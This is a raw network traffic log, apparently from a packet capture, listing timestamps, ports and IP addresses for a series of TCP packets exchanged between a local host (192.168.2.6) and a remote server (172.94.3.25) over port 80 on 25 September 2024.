Sep 25, 2024 16:03:32.274554968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274571896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274574995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274578094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274589062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274601936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274682045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.274739981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.274777889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274789095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274801016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274812937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274838924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.274880886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.352596045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352627039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352638006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352649927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352662086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352674007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352684975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.352722883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.352817059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.353312969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353334904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353348970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353358984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.353395939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.353421926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353432894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353442907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.353472948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.362788916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.362802029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.362874985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.405472994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.433315039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433331966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433343887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433355093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433367968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433381081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433393002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433403969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433425903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433429956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.433443069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433454037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433465004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433475971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.433501959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.433537006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.441042900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.441081047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.441104889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.483627081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.513008118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513025045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513036966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513047934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513055086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513065100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513084888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513098001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513109922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513119936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513134003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.513238907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.519696951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.519727945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.519776106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.561717987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588352919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588387966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588398933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588409901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588454962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588483095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588501930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588553905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588566065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588587046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588629961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588648081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588660002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588664055 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588669062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588681936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588690042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588694096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588705063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.588715076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.588732958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.601294041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.601310015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.601357937 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.880733013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880775928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880795002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880806923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880817890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880830050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880850077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880861998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880873919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880886078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880891085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.880897045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880908012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880918026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880929947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.880948067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.880975962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.683969975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684134007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684146881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684160948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684171915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684184074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684185028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684196949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684209108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684210062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684221029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684232950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684241056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684247017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684272051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684453964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684463978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684475899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684488058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684489012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684503078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684509993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684540987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684586048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684597969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684609890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684639931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684766054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684778929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684789896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684802055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684803009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684813976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684828043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684835911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684839010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684854984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.684856892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.684873104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732398033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732454062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732465982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732501030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732511997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732522011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732532024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732543945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732544899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732558012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732568979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732578993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732620955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732644081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732655048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732666016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732678890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.732700109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.732724905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.810770035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.810789108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.810801983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.810815096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.810934067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.810966015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.811192989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811204910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811218977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811244011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.811284065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811295986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811307907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811317921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.811321020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.811340094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.820751905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.820782900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.820844889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.874330044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.891211987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891244888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891254902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891268015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891280890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891359091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.891585112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891614914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891625881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.891658068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891668081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.891690016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.892425060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.892450094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.892462015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.892461061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.892474890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.892494917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.892501116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.892534971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.911350965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.911362886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.911451101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.970774889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970789909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970807076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970819950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970829964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970843077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.970894098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.970935106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.971450090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.971472025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.971489906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.971514940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.971524000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.971538067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.971556902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:34.979684114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.979696989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:34.979759932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.048651934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048695087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048707008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048721075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048732996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048749924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048763037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.048823118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.048858881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.049232960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049243927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049256086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049273014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.049302101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.049351931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049361944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049374104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.049411058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.064547062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.064563990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.064661026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.141243935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141261101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141273975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141308069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141318083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141330004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141343117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141354084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141355038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.141416073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.141442060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141450882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141462088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.141499043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.142214060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142251968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.142329931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142339945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142373085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.142385006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142395973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142406940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.142431974 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.186767101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.220592022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220618963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220638037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220650911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220662117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220683098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220696926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220706940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220719099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220730066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.220732927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220752001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220763922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.220773935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.220796108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.299146891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299176931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299197912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299209118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299221039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299232960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299364090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.299443007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.299540997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299551964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299561977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299596071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299606085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299609900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.299618959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299629927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299643993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.299658060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.299689054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.379616022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379637003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379652977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379687071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379708052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379719973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379729033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379744053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379746914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.379753113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379807949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.379827023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.379842997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.379981995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380004883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380014896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380036116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.380058050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380069017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380079031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.380100012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.380130053 CEST	49715	80	192.168.2.6	172.94.3.25
